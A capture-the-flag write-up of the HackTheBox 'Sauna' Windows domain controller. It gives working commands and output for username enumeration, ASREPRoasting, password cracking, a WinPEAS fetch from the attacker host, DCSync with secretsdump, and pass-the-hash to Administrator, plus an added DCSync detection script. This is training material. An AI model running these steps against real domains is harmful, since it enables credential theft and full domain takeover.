HackTheBox Sauna

Writeup for HackTheBox Sauna

Machine Synopsis

Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation. Possible usernames can be derived from employee full names listed on the website. With these usernames, an ASREPRoasting attack can be performed, which results in a hash for an account that does not require Kerberos pre-authentication. This hash can be subjected to an offline brute force attack, in order to recover the plaintext password for a user that is able to WinRM to the box. Running WinPEAS reveals that another system user has been configured to automatically login and it identifies their password. This second user also has Windows remote management permissions. BloodHound reveals that this user has the DS-Replication-Get-Changes-All extended right, which allows them to dump password hashes from the Domain Controller in a DCSync attack. Executing this attack returns the hash of the primary domain administrator, which can be used with Impacket psexec.py in order to gain a shell on the box as NT_AUTHORITY\SYSTEM. (Source)

Enumeration

A full TCP port scan first, then default scripts and version detection against the ports it finds:

❯ nmap -p- --min-rate 10000 10.10.10.175

PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49677/tcp open  unknown
49689/tcp open  unknown
49696/tcp open  unknown

❯ nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49689,49696 -sC -sV 10.10.10.175

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-06 11:42:41Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49689/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h44m13s
| smb2-time: 
|   date: 2025-02-06T11:43:34
|_  start_date: N/A

The LDAP banner gives the domain EGOTISTICAL-BANK.LOCAL (the trailing "0." nmap prints is a display quirk, not part of the name) and the host name SAUNA, and the combination of DNS, Kerberos, LDAP/Global Catalog, SMB and WinRM means this is a domain controller. Note the 6h44m clock skew: it does not affect the NTLM logons and pre-authentication-less Kerberos requests used below, but any ticket-based Kerberos authentication would be rejected by the KDC (default tolerance is five minutes) until the attacking host syncs its clock, for example with sudo ntpdate 10.10.10.175. Add the domain name to /etc/hosts:

echo -e '10.10.10.175\tEGOTISTICAL-BANK.LOCAL' | sudo tee -a /etc/hosts

The IIS site on port 80 is the Egotistical Bank homepage. Its About Us page lists the bank's team, which is the raw material for username enumeration.

(screenshot: homepage)

(screenshot: About Us page)

We note the full names:

cat users.txt
Fergus Smith
Shaun Coins
Hugo Bear 
Bowie Taylor 
Steven Kerb 
Sophie Driver 

Organisations derive logon names from full names by a fixed convention (first initial plus surname, first.last, and so on), but we do not yet know which one. username-anarchy generates the common permutations for every name so that the next step can test them all:

❯ git clone https://github.com/urbanadventurer/username-anarchy
❯ cd username-anarchy
❯ ./username-anarchy --input-file ../users.txt > usernames.txt
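As an added example (my code, not the post's and not username-anarchy's), the script below builds the same kind of list in Python from the names collected above. The FORMATS table is an assumption about common naming conventions, not something the box tells us; a real tool ships a much longer list. Once kerbrute confirms a hit you know the convention in use (here first initial plus surname) and can collapse the list to that single format for any further names you find.

```python
# Added example (not from the original post or from username-anarchy): build
# candidate AD logon names from the full names found on the About Us page.
# FORMATS is an assumption about common naming conventions.

# Constructed input: the names collected in users.txt above.
FULL_NAMES = """
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Steven Kerb
Sophie Driver
""".strip().splitlines()

# Each entry is a format over first name, last name and their initials (f, l).
FORMATS = [
    "{first}",
    "{last}",
    "{first}{last}",
    "{first}.{last}",
    "{first}_{last}",
    "{first}-{last}",
    "{f}{last}",
    "{f}.{last}",
    "{f}_{last}",
    "{first}{l}",
    "{first}.{l}",
    "{last}{f}",
    "{last}.{f}",
    "{last}{first}",
    "{f}{l}",
]


def split_name(full_name: str) -> tuple:
    """Return (first, last) lower-cased; middle names are folded into 'last'."""
    parts = full_name.strip().lower().split()
    if len(parts) < 2:
        raise ValueError(f"need at least two name parts: {full_name!r}")
    return parts[0], "".join(parts[1:])


def candidates_for(full_name: str) -> list:
    """All format permutations for one person, in FORMATS order, de-duplicated."""
    first, last = split_name(full_name)
    seen, out = set(), []
    for fmt in FORMATS:
        user = fmt.format(first=first, last=last, f=first[0], l=last[0])
        if user not in seen:
            seen.add(user)
            out.append(user)
    return out


def build_wordlist(names: list) -> list:
    """Candidate usernames for every name, de-duplicated across people."""
    seen, out = set(), []
    for name in names:
        for user in candidates_for(name):
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


if __name__ == "__main__":
    # Feed the output to kerbrute / GetNPUsers exactly like usernames.txt above.
    for user in build_wordlist(FULL_NAMES):
        print(user)
```

Keep the list small and ordered by likelihood: every candidate is one AS-REQ against the DC, and each miss is a 4768 audit event with a "client unknown" result if Kerberos authentication auditing is enabled.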

kerbrute sends an AS-REQ for each candidate name. The KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for accounts that do not exist and KDC_ERR_PREAUTH_REQUIRED (or a full AS-REP, when pre-authentication is not required) for accounts that do, so valid usernames are confirmed without a single password guess. The flags below belong to the Impacket-based Python kerbrute, which is why the output carries an Impacket banner:

❯ kerbrute -domain EGOTISTICAL-BANK.LOCAL -users usernames.txt -dc-ip "10.10.10.175"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Valid user => fsmith [NOT PREAUTH]
[*] No passwords were discovered :'(

We get exactly one hit: fsmith exists, which also tells us the naming convention is first initial plus surname. The [NOT PREAUTH] flag means the account has "Do not require Kerberos preauthentication" set, so the KDC will hand out an AS-REP for it without any proof of the password.

Exploitation

Because fsmith does not require pre-authentication, impacket-GetNPUsers can request an AS-REP for the account with -no-pass. Part of that reply is encrypted under fsmith's long-term key, and that ciphertext is what gets brute-forced offline (ASREPRoasting). The $krb5asrep$23$ prefix shows encryption type 23, RC4-HMAC, whose key is the NT hash itself, which makes it the cheapest type to crack; hashcat mode 18200 accepts the same format.

❯ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -usersfile usernames.txt -no-pass -dc-ip "10.10.10.175"
...
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:48fe8f092c6487f6f82bd885b06dab73$...

Save the line to a file and crack it with john; the format is auto-detected and rockyou is enough here:

❯ john fsmith_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
...
Thestrokes23     ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)     
Session completed. 

fsmith is allowed to use WinRM (port 5985 is open), so evil-winrm gives us a shell, and the user flag is on the Desktop:

❯ evil-winrm -i 10.10.10.175 -P 5985 -u fsmith -p 'Thestrokes23'
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
b84a60fef34f080262db6039c9a92afb

Privilege Escalation

Running WinPEAS as fsmith turns up AutoLogon credentials. The binary is fetched from the attacking host (10.10.16.4 here) with wget inside the Evil-WinRM session. The AutoLogon check reads the Winlogon registry key (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon), where DefaultUserName and DefaultPassword are stored in plaintext whenever automatic logon has been configured; the same values can be read with a plain reg query against that key.

*Evil-WinRM* PS C:\Users\FSmith\Desktop> wget http://10.10.16.4/winPEASany.exe -outfile winpeas.exe
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ./winpeas.exe
...
╔══════════╣ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
...

So there is a plaintext password, Moneymakestheworldgoround!, for a service account. Mind the name, though: the registry value says svc_loanmanager, but no such account exists in the domain. The account that does exist (BloodHound and the NTDS dump below both show it) is svc_loanmgr, and the password is valid for EGOTISTICAL-BANK\svc_loanmgr, which also has WinRM access.

Collect the domain with bloodhound-python using fsmith's credentials; any authenticated domain user can read the ACLs we are interested in:

❯ /usr/bin/bloodhound-python -u fsmith -p "Thestrokes23" -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (SAUNA.EGOTISTICAL-BANK.LOCAL:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 03S

The TGT warning in the output only means SAUNA.EGOTISTICAL-BANK.LOCAL is not resolvable from the attacking host; bloodhound-python falls back to NTLM, which is fine here (adding the DC's FQDN to /etc/hosts avoids it). In the graph, SVC_LOANMGR's outbound object control on the domain object shows GetChanges and GetChangesAll, i.e. the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights. Holding both is what a domain controller needs in order to replicate, so BloodHound labels the combination DCSync: the account can ask the DC over DRSUAPI for any account's secrets, including krbtgt and Administrator, without ever touching NTDS.dit on disk.

(screenshot: BloodHound, SVC_LOANMGR outbound object control on EGOTISTICAL-BANK.LOCAL)
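The same two rights are what a defender watches for. When they are exercised, the DC logs Security event 4662 ("An operation was performed on an object") with the rights' GUIDs in the Properties field, and the tell is a subject that is not a domain controller. As an added example (my code, not the post's, and the event records are constructed for illustration rather than captured from Sauna), the script below applies that rule to a handful of 4662-shaped records; the GUIDs are the fixed schema values for the replication extended rights, and the allow-list of legitimate replicators is an assumption you would populate with your DCs and any Azure AD Connect (MSOL_*) accounts.

```python
# Added example (not from the original post): flag DCSync-style replication
# requests in Windows Security event 4662 records. A DCSync is authorised by
# the replication control-access rights BloodHound showed for SVC_LOANMGR;
# when they are exercised the DC logs a 4662 whose Properties field lists the
# GUIDs of those rights.
import re
from typing import Optional

# Schema GUIDs of the replication extended rights (fixed values in AD).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit meaning "Control Access" (extended right used)
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

# Constructed sample events (made up for this example; field names follow the
# 4662 schema). First: normal DC-to-DC replication under the DC's machine
# account. Second: a user account pulling changes, i.e. a DCSync. Rest: noise.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "ObjectServer": "DS",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "ObjectServer": "DS",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "fsmith", "ObjectServer": "DS",
     "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectUserName": "fsmith"},
]


def replication_rights_in(properties: str) -> list:
    """Names of replication rights whose GUIDs appear in a Properties field."""
    return [REPLICATION_RIGHTS[g.lower()]
            for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def classify(event: dict, allowed_replicators: set) -> Optional[list]:
    """Rights used if the event is a replication request by an account that is
    not expected to replicate; None otherwise. allowed_replicators holds the
    accounts that legitimately replicate (DC machine accounts, MSOL_* etc.)."""
    if event.get("EventID") != 4662 or event.get("ObjectServer") != "DS":
        return None
    if not int(event.get("AccessMask", "0"), 16) & CONTROL_ACCESS:
        return None
    rights = replication_rights_in(event.get("Properties", ""))
    if not rights:
        return None
    allowed = {a.lower() for a in allowed_replicators}
    if event.get("SubjectUserName", "").lower() in allowed:
        return None
    return rights


def find_dcsync(events: list, allowed_replicators: set) -> list:
    """(account, rights) for every event that looks like a DCSync."""
    findings = []
    for ev in events:
        rights = classify(ev, allowed_replicators)
        if rights:
            findings.append((ev["SubjectUserName"], rights))
    return findings


if __name__ == "__main__":
    for account, rights in find_dcsync(SAMPLE_EVENTS, {"SAUNA$"}):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

Two operational caveats: 4662 for these rights is only written when Directory Service Access auditing is enabled and the SACL on the domain object covers them, and DS-Replication-Get-Changes on its own cannot return secrets, so a stricter rule can key on the -All (and -In-Filtered-Set) GUIDs alone to cut noise.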

With the DCSync rights confirmed, dump the secrets as svc_loanmgr (the real account name, not the svc_loanmanager the registry reported). secretsdump first tries its registry-based path over SMB, which fails with rpc_s_access_denied because svc_loanmgr is not a local administrator on the DC; it then falls back to the DRSUAPI method, which needs only the two replication rights and returns every account's NT hash and Kerberos keys from NTDS.DIT:

❯ impacket-secretsdump 'EGOTISTICAL-BANK.local/svc_loanmgr:Moneymakestheworldgoround!'@10.10.10.175
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:d9a2c0338047dd5b99318dd43bb3123b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:f52280e9e61be8d50d3aaead2a95215a5a22d47371049ed76571ad44ef7653a2
SAUNA$:aes128-cts-hmac-sha1-96:cf1799d0913c1e909231e956e72c2954
SAUNA$:des-cbc-md5:cd7f6d75cb7f1f2f
[*] Cleaning up... 

There is no need to crack the Administrator hash: WinRM accepts NTLM, so evil-winrm can pass the NT hash directly with -H. The dump also shows that HSmith and FSmith carry the identical NT hash 58a52d36c84fb7f5f1beab9a201db1dd, so HSmith's password is Thestrokes23 as well; password reuse between accounts is exactly what a full NTDS dump surfaces.

❯ evil-winrm -i 10.10.10.175 -u Administrator -H "823452073d75b9d1cf70ebdf86c7f98e"
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
cafb18273b8d23906e6de535509a022c
This post is licensed under CC BY 4.0 by the author.